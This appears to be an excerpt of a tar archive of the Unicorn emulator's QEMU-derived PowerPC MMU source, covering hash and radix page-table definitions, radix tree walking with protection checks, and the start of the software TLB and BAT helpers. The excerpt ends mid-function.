#define SDR_64_HTABSIZE 0x000000000000001FULL #define PATE0_HTABORG 0x0FFFFFFFFFFC0000ULL #define HPTES_PER_GROUP 8 #define HASH_PTE_SIZE_64 16 #define HASH_PTEG_SIZE_64 (HASH_PTE_SIZE_64 * HPTES_PER_GROUP) #define HPTE64_V_SSIZE SLB_VSID_B #define HPTE64_V_SSIZE_256M SLB_VSID_B_256M #define HPTE64_V_SSIZE_1T SLB_VSID_B_1T #define HPTE64_V_SSIZE_SHIFT 62 #define HPTE64_V_AVPN_SHIFT 7 #define HPTE64_V_AVPN 0x3fffffffffffff80ULL #define HPTE64_V_AVPN_VAL(x) (((x) & HPTE64_V_AVPN) >> HPTE64_V_AVPN_SHIFT) #define HPTE64_V_COMPARE(x, y) (!(((x) ^ (y)) & 0xffffffffffffff83ULL)) #define HPTE64_V_BOLTED 0x0000000000000010ULL #define HPTE64_V_LARGE 0x0000000000000004ULL #define HPTE64_V_SECONDARY 0x0000000000000002ULL #define HPTE64_V_VALID 0x0000000000000001ULL #define HPTE64_R_PP0 0x8000000000000000ULL #define HPTE64_R_TS 0x4000000000000000ULL #define HPTE64_R_KEY_HI 0x3000000000000000ULL #define HPTE64_R_RPN_SHIFT 12 #define HPTE64_R_RPN 0x0ffffffffffff000ULL #define HPTE64_R_FLAGS 0x00000000000003ffULL #define HPTE64_R_PP 0x0000000000000003ULL #define HPTE64_R_N 0x0000000000000004ULL #define HPTE64_R_G 0x0000000000000008ULL #define HPTE64_R_M 0x0000000000000010ULL #define HPTE64_R_I 0x0000000000000020ULL #define HPTE64_R_W 0x0000000000000040ULL #define HPTE64_R_WIMG 0x0000000000000078ULL #define HPTE64_R_C 0x0000000000000080ULL #define HPTE64_R_R 0x0000000000000100ULL #define HPTE64_R_KEY_LO 0x0000000000000e00ULL #define HPTE64_R_KEY(x) ((((x) & HPTE64_R_KEY_HI) >> 57) | \ (((x) & HPTE64_R_KEY_LO) >> 9)) #define HPTE64_V_1TB_SEG 0x4000000000000000ULL #define HPTE64_V_VRMA_MASK 0x4001ffffff000000ULL /* Format changes for ARCH v3 */ #define HPTE64_V_COMMON_BITS 0x000fffffffffffffULL #define HPTE64_R_3_0_SSIZE_SHIFT 58 #define HPTE64_R_3_0_SSIZE_MASK (3ULL << HPTE64_R_3_0_SSIZE_SHIFT) struct ppc_hash_pte64 { uint64_t pte0, pte1; }; const ppc_hash_pte64_t *ppc_hash64_map_hptes(PowerPCCPU *cpu, hwaddr ptex, int n); void ppc_hash64_unmap_hptes(PowerPCCPU *cpu, const ppc_hash_pte64_t *hptes, hwaddr ptex, int n); static inline uint64_t ppc_hash64_hpte0(PowerPCCPU *cpu, const ppc_hash_pte64_t *hptes, int i) { return ldq_p(&(hptes[i].pte0)); } static inline uint64_t ppc_hash64_hpte1(PowerPCCPU *cpu, const ppc_hash_pte64_t *hptes, int i) { return ldq_p(&(hptes[i].pte1)); } /* * MMU Options */ struct PPCHash64PageSize { uint32_t page_shift; /* Page shift (or 0) */ uint32_t pte_enc; /* Encoding in the HPTE (>>12) */ }; typedef struct PPCHash64PageSize PPCHash64PageSize; struct PPCHash64SegmentPageSizes { uint32_t page_shift; /* Base page shift of segment (or 0) */ uint32_t slb_enc; /* SLB encoding for BookS */ PPCHash64PageSize enc[PPC_PAGE_SIZES_MAX_SZ]; }; struct PPCHash64Options { #define PPC_HASH64_1TSEG 0x00001 #define PPC_HASH64_AMR 0x00002 #define PPC_HASH64_CI_LARGEPAGE 0x00004 unsigned flags; unsigned slb_size; PPCHash64SegmentPageSizes sps[PPC_PAGE_SIZES_MAX_SZ]; }; extern const PPCHash64Options ppc_hash64_opts_basic; extern const PPCHash64Options ppc_hash64_opts_POWER7; static inline bool ppc_hash64_has(PowerPCCPU *cpu, unsigned feature) { return !!(cpu->hash64_opts->flags & feature); } #endif /* MMU_HASH64_H */ 
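/*
 * Worked example for the HPTE64_R_KEY() accessor above (illustrative,
 * hypothetical pte1 value; not taken from the original source).  The
 * 5-bit storage key is split across pte1: key[4:3] live in
 * HPTE64_R_KEY_HI (bits 61:60) and key[2:0] in HPTE64_R_KEY_LO
 * (bits 11:9).
 */
#if 0 /* example only, not compiled */
static void example_hpte_key_check(void)
{
    uint64_t pte1 = 0x1000000000000200ULL; /* bit 60 and bit 9 set */
    /* (pte1 & HPTE64_R_KEY_HI) >> 57 == 0x8,
     * (pte1 & HPTE64_R_KEY_LO) >> 9  == 0x1, so the key is 0x9 */
    assert(HPTE64_R_KEY(pte1) == 0x9);
}
#endif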
unicorn-2.1.1/qemu/target/ppc/mmu-radix64.c
/*
 * PowerPC Radix MMU emulation helpers for QEMU.
 *
 * Copyright (c) 2016 Suraj Jitindar Singh, IBM Corporation
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/exec-all.h"
#include "exec/helper-proto.h"
#include "mmu-radix64.h"
#include "mmu-book3s-v3.h"

static bool ppc_radix64_get_fully_qualified_addr(CPUPPCState *env, vaddr eaddr,
                                                 uint64_t *lpid, uint64_t *pid)
{
    if (msr_hv) { /* MSR[HV] -> Hypervisor/bare metal */
        switch (eaddr & R_EADDR_QUADRANT) {
        case R_EADDR_QUADRANT0:
            *lpid = 0;
            *pid = env->spr[SPR_BOOKS_PID];
            break;
        case R_EADDR_QUADRANT1:
            *lpid = env->spr[SPR_LPIDR];
            *pid = env->spr[SPR_BOOKS_PID];
            break;
        case R_EADDR_QUADRANT2:
            *lpid = env->spr[SPR_LPIDR];
            *pid = 0;
            break;
        case R_EADDR_QUADRANT3:
            *lpid = 0;
            *pid = 0;
            break;
        }
    } else { /* !MSR[HV] -> Guest */
        switch (eaddr & R_EADDR_QUADRANT) {
        case R_EADDR_QUADRANT0: /* Guest application */
            *lpid = env->spr[SPR_LPIDR];
            *pid = env->spr[SPR_BOOKS_PID];
            break;
        case R_EADDR_QUADRANT1: /* Illegal */
        case R_EADDR_QUADRANT2:
            return false;
        case R_EADDR_QUADRANT3: /* Guest OS */
            *lpid = env->spr[SPR_LPIDR];
            *pid = 0; /* pid set to 0 -> addresses guest operating system */
            break;
        }
    }

    return true;
}

static void ppc_radix64_raise_segi(PowerPCCPU *cpu, int rwx, vaddr eaddr)
{
    CPUState *cs = CPU(cpu);
    CPUPPCState *env = &cpu->env;

    if (rwx == 2) { /* Instruction Segment Interrupt */
        cs->exception_index = POWERPC_EXCP_ISEG;
    } else { /* Data Segment Interrupt */
        cs->exception_index = POWERPC_EXCP_DSEG;
        env->spr[SPR_DAR] = eaddr;
    }
    env->error_code = 0;
}

static void ppc_radix64_raise_si(PowerPCCPU *cpu, int rwx, vaddr eaddr,
                                 uint32_t cause)
{
    CPUState *cs = CPU(cpu);
    CPUPPCState *env = &cpu->env;

    if (rwx == 2) { /* Instruction Storage Interrupt */
        cs->exception_index = POWERPC_EXCP_ISI;
        env->error_code = cause;
    } else { /* Data Storage Interrupt */
        cs->exception_index = POWERPC_EXCP_DSI;
        if (rwx == 1) { /* Write -> Store */
            cause |= DSISR_ISSTORE;
        }
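        /*
         * For a DSI the cause bits are reported through DSISR and the
         * faulting effective address through DAR; the ISI path above
         * instead carries the cause in error_code, which the exception
         * delivery code reports via SRR1.
         */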
env->spr[SPR_DSISR] = cause; env->spr[SPR_DAR] = eaddr; env->error_code = 0; } } static bool ppc_radix64_check_prot(PowerPCCPU *cpu, int rwx, uint64_t pte, int *fault_cause, int *prot) { CPUPPCState *env = &cpu->env; const int need_prot[] = { PAGE_READ, PAGE_WRITE, PAGE_EXEC }; /* Check Page Attributes (pte58:59) */ if (((pte & R_PTE_ATT) == R_PTE_ATT_NI_IO) && (rwx == 2)) { /* * Radix PTE entries with the non-idempotent I/O attribute are treated * as guarded storage */ *fault_cause |= SRR1_NOEXEC_GUARD; return true; } /* Determine permissions allowed by Encoded Access Authority */ if ((pte & R_PTE_EAA_PRIV) && msr_pr) { /* Insufficient Privilege */ *prot = 0; } else if (msr_pr || (pte & R_PTE_EAA_PRIV)) { *prot = ppc_radix64_get_prot_eaa(pte); } else { /* !msr_pr && !(pte & R_PTE_EAA_PRIV) */ *prot = ppc_radix64_get_prot_eaa(pte); *prot &= ppc_radix64_get_prot_amr(cpu); /* Least combined permissions */ } /* Check if requested access type is allowed */ if (need_prot[rwx] & ~(*prot)) { /* Page Protected for that Access */ *fault_cause |= DSISR_PROTFAULT; return true; } return false; } static void ppc_radix64_set_rc(PowerPCCPU *cpu, int rwx, uint64_t pte, hwaddr pte_addr, int *prot) { CPUState *cs = CPU(cpu); uint64_t npte; npte = pte | R_PTE_R; /* Always set reference bit */ if (rwx == 1) { /* Store/Write */ npte |= R_PTE_C; /* Set change bit */ } else { /* * Treat the page as read-only for now, so that a later write * will pass through this function again to set the C bit. */ *prot &= ~PAGE_WRITE; } if (pte ^ npte) { /* If pte has changed then write it back */ #ifdef UNICORN_ARCH_POSTFIX glue(stq_phys, UNICORN_ARCH_POSTFIX)(cs->uc, cs->as, pte_addr, npte); #else stq_phys(cs->uc, cs->as, pte_addr, npte); #endif } } static uint64_t ppc_radix64_walk_tree(PowerPCCPU *cpu, vaddr eaddr, uint64_t base_addr, uint64_t nls, hwaddr *raddr, int *psize, int *fault_cause, hwaddr *pte_addr) { CPUState *cs = CPU(cpu); uint64_t index, pde; if (nls < 5) { /* Directory maps less than 2**5 entries */ *fault_cause |= DSISR_R_BADCONFIG; return 0; } /* Read page <directory/table> entry from guest address space */ index = eaddr >> (*psize - nls); /* Shift */ index &= ((1UL << nls) - 1); /* Mask */ #ifdef UNICORN_ARCH_POSTFIX pde = glue(ldq_phys, UNICORN_ARCH_POSTFIX)(cs->uc, cs->as, base_addr + (index * sizeof(pde))); #else pde = ldq_phys(cs->uc, cs->as, base_addr + (index * sizeof(pde))); #endif if (!(pde & R_PTE_VALID)) { /* Invalid Entry */ *fault_cause |= DSISR_NOPTE; return 0; } *psize -= nls; /* Check if Leaf Entry -> Page Table Entry -> Stop the Search */ if (pde & R_PTE_LEAF) { uint64_t rpn = pde & R_PTE_RPN; uint64_t mask = (1UL << *psize) - 1; /* Or high bits of rpn and low bits to ea to form whole real addr */ *raddr = (rpn & ~mask) | (eaddr & mask); *pte_addr = base_addr + (index * sizeof(pde)); return pde; } /* Next Level of Radix Tree */ return ppc_radix64_walk_tree(cpu, eaddr, pde & R_PDE_NLB, pde & R_PDE_NLS, raddr, psize, fault_cause, pte_addr); } static bool validate_pate(PowerPCCPU *cpu, uint64_t lpid, ppc_v3_pate_t *pate) { CPUPPCState *env = &cpu->env; if (!(pate->dw0 & PATE0_HR)) { return false; } if (lpid == 0 && !msr_hv) { return false; } /* More checks ... 
*/ return true; } int ppc_radix64_handle_mmu_fault(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; #if 0 PPCVirtualHypervisorClass *vhc; #endif hwaddr raddr, pte_addr; uint64_t lpid = 0, pid = 0, offset, size, prtbe0, pte; int page_size, prot, fault_cause = 0; ppc_v3_pate_t pate; assert((rwx == 0) || (rwx == 1) || (rwx == 2)); /* HV or virtual hypervisor Real Mode Access */ if ((msr_hv) && (((rwx == 2) && (msr_ir == 0)) || ((rwx != 2) && (msr_dr == 0)))) { /* In real mode top 4 effective addr bits (mostly) ignored */ raddr = eaddr & 0x0FFFFFFFFFFFFFFFULL; /* In HV mode, add HRMOR if top EA bit is clear */ if (msr_hv || !env->has_hv_mode) { if (!(eaddr >> 63)) { raddr |= env->spr[SPR_HRMOR]; } } tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, PAGE_READ | PAGE_WRITE | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE); return 0; } /* * Check UPRT (we avoid the check in real mode to deal with * transitional states during kexec. */ #if 0 if (!ppc64_use_proc_tbl(cpu)) { qemu_log_mask(LOG_GUEST_ERROR, "LPCR:UPRT not set in radix mode ! LPCR=" TARGET_FMT_lx "\n", env->spr[SPR_LPCR]); } #endif /* Virtual Mode Access - get the fully qualified address */ if (!ppc_radix64_get_fully_qualified_addr(env, eaddr, &lpid, &pid)) { ppc_radix64_raise_segi(cpu, rwx, eaddr); return 1; } /* Get Process Table */ #if 0 if (cpu->vhyp) { vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->get_pate(cpu->vhyp, &pate); } else { #endif if (!ppc64_v3_get_pate(cpu, lpid, &pate)) { ppc_radix64_raise_si(cpu, rwx, eaddr, DSISR_NOPTE); return 1; } if (!validate_pate(cpu, lpid, &pate)) { ppc_radix64_raise_si(cpu, rwx, eaddr, DSISR_R_BADCONFIG); } /* We don't support guest mode yet */ if (lpid != 0) { fprintf(stderr, "PowerNV guest support Unimplemented"); exit(1); } #if 0 } #endif /* Index Process Table by PID to Find Corresponding Process Table Entry */ offset = pid * sizeof(struct prtb_entry); size = 1ULL << ((pate.dw1 & PATE1_R_PRTS) + 12); if (offset >= size) { /* offset exceeds size of the process table */ ppc_radix64_raise_si(cpu, rwx, eaddr, DSISR_NOPTE); return 1; } #ifdef UNICORN_ARCH_POSTFIX prtbe0 = glue(ldq_phys, UNICORN_ARCH_POSTFIX)(cs->uc, cs->as, (pate.dw1 & PATE1_R_PRTB) + offset); #else prtbe0 = ldq_phys(cs->uc, cs->as, (pate.dw1 & PATE1_R_PRTB) + offset); #endif /* Walk Radix Tree from Process Table Entry to Convert EA to RA */ page_size = PRTBE_R_GET_RTS(prtbe0); pte = ppc_radix64_walk_tree(cpu, eaddr & R_EADDR_MASK, prtbe0 & PRTBE_R_RPDB, prtbe0 & PRTBE_R_RPDS, &raddr, &page_size, &fault_cause, &pte_addr); if (!pte || ppc_radix64_check_prot(cpu, rwx, pte, &fault_cause, &prot)) { /* Couldn't get pte or access denied due to protection */ ppc_radix64_raise_si(cpu, rwx, eaddr, fault_cause); return 1; } /* Update Reference and Change Bits */ ppc_radix64_set_rc(cpu, rwx, pte, pte_addr, &prot); tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, prot, mmu_idx, 1ULL << page_size); return 0; } hwaddr ppc_radix64_get_phys_page_debug(PowerPCCPU *cpu, target_ulong eaddr) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; #if 0 PPCVirtualHypervisorClass *vhc; #endif hwaddr raddr, pte_addr; uint64_t lpid = 0, pid = 0, offset, size, prtbe0, pte; int page_size, fault_cause = 0; ppc_v3_pate_t pate; /* Handle Real Mode */ if (msr_dr == 0) { /* In real mode top 4 effective addr bits (mostly) ignored */ return eaddr & 0x0FFFFFFFFFFFFFFFULL; } /* Virtual Mode Access - get the fully qualified address */ if 
(!ppc_radix64_get_fully_qualified_addr(env, eaddr, &lpid, &pid)) { return -1; } /* Get Process Table */ #if 0 if (cpu->vhyp) { vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->get_pate(cpu->vhyp, &pate); } else { #endif if (!ppc64_v3_get_pate(cpu, lpid, &pate)) { return -1; } if (!validate_pate(cpu, lpid, &pate)) { return -1; } /* We don't support guest mode yet */ if (lpid != 0) { fprintf(stderr, "PowerNV guest support Unimplemented"); exit(1); } #if 0 } #endif /* Index Process Table by PID to Find Corresponding Process Table Entry */ offset = pid * sizeof(struct prtb_entry); size = 1ULL << ((pate.dw1 & PATE1_R_PRTS) + 12); if (offset >= size) { /* offset exceeds size of the process table */ return -1; } #ifdef UNICORN_ARCH_POSTFIX prtbe0 = glue(ldq_phys, UNICORN_ARCH_POSTFIX)(cs->uc, cs->as, (pate.dw1 & PATE1_R_PRTB) + offset); #else prtbe0 = ldq_phys(cs->uc, cs->as, (pate.dw1 & PATE1_R_PRTB) + offset); #endif /* Walk Radix Tree from Process Table Entry to Convert EA to RA */ page_size = PRTBE_R_GET_RTS(prtbe0); pte = ppc_radix64_walk_tree(cpu, eaddr & R_EADDR_MASK, prtbe0 & PRTBE_R_RPDB, prtbe0 & PRTBE_R_RPDS, &raddr, &page_size, &fault_cause, &pte_addr); if (!pte) { return -1; } return raddr & TARGET_PAGE_MASK; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-radix64.h���������������������������������������������������������0000664�0000000�0000000�00000005170�14675241067�0020454�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef MMU_RADIX64_H #define MMU_RADIX64_H /* Radix Quadrants */ #define R_EADDR_MASK 0x3FFFFFFFFFFFFFFF #define R_EADDR_QUADRANT 0xC000000000000000 #define R_EADDR_QUADRANT0 0x0000000000000000 #define R_EADDR_QUADRANT1 0x4000000000000000 #define R_EADDR_QUADRANT2 0x8000000000000000 #define R_EADDR_QUADRANT3 0xC000000000000000 /* Radix Partition Table Entry Fields */ #define PATE1_R_PRTB 0x0FFFFFFFFFFFF000 #define PATE1_R_PRTS 0x000000000000001F /* Radix Process Table Entry Fields */ #define PRTBE_R_GET_RTS(rts) \ ((((rts >> 58) & 0x18) | ((rts >> 5) & 0x7)) + 31) #define PRTBE_R_RPDB 0x0FFFFFFFFFFFFF00 #define PRTBE_R_RPDS 0x000000000000001F /* Radix Page Directory/Table Entry Fields */ #define R_PTE_VALID 0x8000000000000000 #define R_PTE_LEAF 0x4000000000000000 #define R_PTE_SW0 0x2000000000000000 #define R_PTE_RPN 0x01FFFFFFFFFFF000 #define R_PTE_SW1 0x0000000000000E00 #define R_GET_SW(sw) (((sw >> 58) & 0x8) | ((sw >> 9) & 0x7)) #define R_PTE_R 0x0000000000000100 #define R_PTE_C 0x0000000000000080 #define R_PTE_ATT 0x0000000000000030 #define R_PTE_ATT_NORMAL 0x0000000000000000 #define R_PTE_ATT_SAO 0x0000000000000010 #define R_PTE_ATT_NI_IO 0x0000000000000020 #define R_PTE_ATT_TOLERANT_IO 0x0000000000000030 #define R_PTE_EAA_PRIV 0x0000000000000008 #define R_PTE_EAA_R 0x0000000000000004 #define R_PTE_EAA_RW 0x0000000000000002 #define R_PTE_EAA_X 
0x0000000000000001 #define R_PDE_NLB PRTBE_R_RPDB #define R_PDE_NLS PRTBE_R_RPDS #ifdef TARGET_PPC64 int ppc_radix64_handle_mmu_fault(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx); hwaddr ppc_radix64_get_phys_page_debug(PowerPCCPU *cpu, target_ulong addr); static inline int ppc_radix64_get_prot_eaa(uint64_t pte) { return (pte & R_PTE_EAA_R ? PAGE_READ : 0) | (pte & R_PTE_EAA_RW ? PAGE_READ | PAGE_WRITE : 0) | (pte & R_PTE_EAA_X ? PAGE_EXEC : 0); } static inline int ppc_radix64_get_prot_amr(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; int amr = env->spr[SPR_AMR] >> 62; /* We only care about key0 AMR63:62 */ int iamr = env->spr[SPR_IAMR] >> 62; /* We only care about key0 IAMR63:62 */ return (amr & 0x2 ? 0 : PAGE_WRITE) | /* Access denied if bit is set */ (amr & 0x1 ? 0 : PAGE_READ) | (iamr & 0x1 ? 0 : PAGE_EXEC); } #endif /* TARGET_PPC64 */ #endif /* MMU_RADIX64_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu_helper.c����������������������������������������������������������0000664�0000000�0000000�00000272024�14675241067�0020533�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC MMU, TLB, SLB and BAT emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/units.h" #include "cpu.h" #include "exec/helper-proto.h" #include "mmu-hash64.h" #include "mmu-hash32.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "helper_regs.h" #include "mmu-book3s-v3.h" #include "mmu-radix64.h" /* #define DEBUG_MMU */ /* #define DEBUG_BATS */ /* #define DEBUG_SOFTWARE_TLB */ /* #define DUMP_PAGE_TABLES */ /* #define FLUSH_ALL_TLBS */ #ifdef DEBUG_MMU # define LOG_MMU_STATE(cpu) log_cpu_state_mask(CPU_LOG_MMU, (cpu), 0) #else # define LOG_MMU_STATE(cpu) do { } while (0) #endif #ifdef DEBUG_SOFTWARE_TLB # define LOG_SWTLB(...) qemu_log_mask(CPU_LOG_MMU, __VA_ARGS__) #else # define LOG_SWTLB(...) do { } while (0) #endif #ifdef DEBUG_BATS # define LOG_BATS(...) qemu_log_mask(CPU_LOG_MMU, __VA_ARGS__) #else # define LOG_BATS(...) 
do { } while (0) #endif /*****************************************************************************/ /* PowerPC MMU emulation */ /* Context used internally during MMU translations */ typedef struct mmu_ctx_t mmu_ctx_t; struct mmu_ctx_t { hwaddr raddr; /* Real address */ hwaddr eaddr; /* Effective address */ int prot; /* Protection bits */ hwaddr hash[2]; /* Pagetable hash values */ target_ulong ptem; /* Virtual segment ID | API */ int key; /* Access key */ int nx; /* Non-execute area */ }; /* Common routines used by software and hardware TLBs emulation */ static inline int pte_is_valid(target_ulong pte0) { return pte0 & 0x80000000 ? 1 : 0; } static inline void pte_invalidate(target_ulong *pte0) { *pte0 &= ~0x80000000; } #define PTE_PTEM_MASK 0x7FFFFFBF #define PTE_CHECK_MASK (TARGET_PAGE_MASK | 0x7B) static int pp_check(int key, int pp, int nx) { int access; /* Compute access rights */ access = 0; if (key == 0) { switch (pp) { case 0x0: case 0x1: case 0x2: access |= PAGE_WRITE; /* fall through */ case 0x3: access |= PAGE_READ; break; } } else { switch (pp) { case 0x0: access = 0; break; case 0x1: case 0x3: access = PAGE_READ; break; case 0x2: access = PAGE_READ | PAGE_WRITE; break; } } if (nx == 0) { access |= PAGE_EXEC; } return access; } static int check_prot(int prot, int rw, int access_type) { int ret; if (access_type == ACCESS_CODE) { if (prot & PAGE_EXEC) { ret = 0; } else { ret = -2; } } else if (rw) { if (prot & PAGE_WRITE) { ret = 0; } else { ret = -2; } } else { if (prot & PAGE_READ) { ret = 0; } else { ret = -2; } } return ret; } static inline int ppc6xx_tlb_pte_check(mmu_ctx_t *ctx, target_ulong pte0, target_ulong pte1, int h, int rw, int type) { target_ulong ptem, mmask; int access, ret, pteh, ptev, pp; ret = -1; /* Check validity and table match */ ptev = pte_is_valid(pte0); pteh = (pte0 >> 6) & 1; if (ptev && h == pteh) { /* Check vsid & api */ ptem = pte0 & PTE_PTEM_MASK; mmask = PTE_CHECK_MASK; pp = pte1 & 0x00000003; if (ptem == ctx->ptem) { #ifdef _MSC_VER if (ctx->raddr != (hwaddr)(0ULL - 1ULL)) { #else if (ctx->raddr != (hwaddr)-1ULL) { #endif /* all matches should have equal RPN, WIMG & PP */ if ((ctx->raddr & mmask) != (pte1 & mmask)) { qemu_log_mask(CPU_LOG_MMU, "Bad RPN/WIMG/PP\n"); return -3; } } /* Compute access rights */ access = pp_check(ctx->key, pp, ctx->nx); /* Keep the matching PTE informations */ ctx->raddr = pte1; ctx->prot = access; ret = check_prot(ctx->prot, rw, type); if (ret == 0) { /* Access granted */ qemu_log_mask(CPU_LOG_MMU, "PTE access granted !\n"); } else { /* Access right violation */ qemu_log_mask(CPU_LOG_MMU, "PTE access rejected\n"); } } } return ret; } static int pte_update_flags(mmu_ctx_t *ctx, target_ulong *pte1p, int ret, int rw) { int store = 0; /* Update page flags */ if (!(*pte1p & 0x00000100)) { /* Update accessed flag */ *pte1p |= 0x00000100; store = 1; } if (!(*pte1p & 0x00000080)) { if (rw == 1 && ret == 0) { /* Update changed flag */ *pte1p |= 0x00000080; store = 1; } else { /* Force page fault for first write access */ ctx->prot &= ~PAGE_WRITE; } } return store; } /* Software driven TLB helpers */ static inline int ppc6xx_tlb_getnum(CPUPPCState *env, target_ulong eaddr, int way, int is_code) { int nr; /* Select TLB num in a way from address */ nr = (eaddr >> TARGET_PAGE_BITS) & (env->tlb_per_way - 1); /* Select TLB way */ nr += env->tlb_per_way * way; /* 6xx have separate TLBs for instructions and data */ if (is_code && env->id_tlbs == 1) { nr += env->nb_tlb; } return nr; } static inline void 
ppc6xx_tlb_invalidate_all(CPUPPCState *env) { ppc6xx_tlb_t *tlb; int nr, max; /* LOG_SWTLB("Invalidate all TLBs\n"); */ /* Invalidate all defined software TLB */ max = env->nb_tlb; if (env->id_tlbs == 1) { max *= 2; } for (nr = 0; nr < max; nr++) { tlb = &env->tlb.tlb6[nr]; pte_invalidate(&tlb->pte0); } tlb_flush(env_cpu(env)); } static inline void ppc6xx_tlb_invalidate_virt2(CPUPPCState *env, target_ulong eaddr, int is_code, int match_epn) { #if !defined(FLUSH_ALL_TLBS) CPUState *cs = env_cpu(env); ppc6xx_tlb_t *tlb; int way, nr; /* Invalidate ITLB + DTLB, all ways */ for (way = 0; way < env->nb_ways; way++) { nr = ppc6xx_tlb_getnum(env, eaddr, way, is_code); tlb = &env->tlb.tlb6[nr]; if (pte_is_valid(tlb->pte0) && (match_epn == 0 || eaddr == tlb->EPN)) { LOG_SWTLB("TLB invalidate %d/%d " TARGET_FMT_lx "\n", nr, env->nb_tlb, eaddr); pte_invalidate(&tlb->pte0); tlb_flush_page(cs, tlb->EPN); } } #else /* XXX: PowerPC specification say this is valid as well */ ppc6xx_tlb_invalidate_all(env); #endif } static inline void ppc6xx_tlb_invalidate_virt(CPUPPCState *env, target_ulong eaddr, int is_code) { ppc6xx_tlb_invalidate_virt2(env, eaddr, is_code, 0); } static void ppc6xx_tlb_store(CPUPPCState *env, target_ulong EPN, int way, int is_code, target_ulong pte0, target_ulong pte1) { ppc6xx_tlb_t *tlb; int nr; nr = ppc6xx_tlb_getnum(env, EPN, way, is_code); tlb = &env->tlb.tlb6[nr]; LOG_SWTLB("Set TLB %d/%d EPN " TARGET_FMT_lx " PTE0 " TARGET_FMT_lx " PTE1 " TARGET_FMT_lx "\n", nr, env->nb_tlb, EPN, pte0, pte1); /* Invalidate any pending reference in QEMU for this virtual address */ ppc6xx_tlb_invalidate_virt2(env, EPN, is_code, 1); tlb->pte0 = pte0; tlb->pte1 = pte1; tlb->EPN = EPN; /* Store last way for LRU mechanism */ env->last_way = way; } static inline int ppc6xx_tlb_check(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong eaddr, int rw, int access_type) { ppc6xx_tlb_t *tlb; int nr, best, way; int ret; best = -1; ret = -1; /* No TLB found */ for (way = 0; way < env->nb_ways; way++) { nr = ppc6xx_tlb_getnum(env, eaddr, way, access_type == ACCESS_CODE ? 1 : 0); tlb = &env->tlb.tlb6[nr]; /* This test "emulates" the PTE index match for hardware TLBs */ if ((eaddr & TARGET_PAGE_MASK) != tlb->EPN) { LOG_SWTLB("TLB %d/%d %s [" TARGET_FMT_lx " " TARGET_FMT_lx "] <> " TARGET_FMT_lx "\n", nr, env->nb_tlb, pte_is_valid(tlb->pte0) ? "valid" : "inval", tlb->EPN, tlb->EPN + TARGET_PAGE_SIZE, eaddr); continue; } LOG_SWTLB("TLB %d/%d %s " TARGET_FMT_lx " <> " TARGET_FMT_lx " " TARGET_FMT_lx " %c %c\n", nr, env->nb_tlb, pte_is_valid(tlb->pte0) ? "valid" : "inval", tlb->EPN, eaddr, tlb->pte1, rw ? 'S' : 'L', access_type == ACCESS_CODE ? 'I' : 'D'); switch (ppc6xx_tlb_pte_check(ctx, tlb->pte0, tlb->pte1, 0, rw, access_type)) { case -3: /* TLB inconsistency */ return -1; case -2: /* Access violation */ ret = -2; best = nr; break; case -1: default: /* No match */ break; case 0: /* access granted */ /* * XXX: we should go on looping to check all TLBs * consistency but we can speed-up the whole thing as * the result would be undefined if TLBs are not * consistent. 
*/ ret = 0; best = nr; goto done; } } if (best != -1) { done: LOG_SWTLB("found TLB at addr " TARGET_FMT_plx " prot=%01x ret=%d\n", ctx->raddr & TARGET_PAGE_MASK, ctx->prot, ret); /* Update page flags */ pte_update_flags(ctx, &env->tlb.tlb6[best].pte1, ret, rw); } return ret; } /* Perform BAT hit & translation */ static inline void bat_size_prot(CPUPPCState *env, target_ulong *blp, int *validp, int *protp, target_ulong *BATu, target_ulong *BATl) { target_ulong bl; int pp, valid, prot; bl = (*BATu & 0x00001FFC) << 15; valid = 0; prot = 0; if (((msr_pr == 0) && (*BATu & 0x00000002)) || ((msr_pr != 0) && (*BATu & 0x00000001))) { valid = 1; pp = *BATl & 0x00000003; if (pp != 0) { prot = PAGE_READ | PAGE_EXEC; if (pp == 0x2) { prot |= PAGE_WRITE; } } } *blp = bl; *validp = valid; *protp = prot; } static int get_bat_6xx_tlb(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong virtual, int rw, int type) { target_ulong 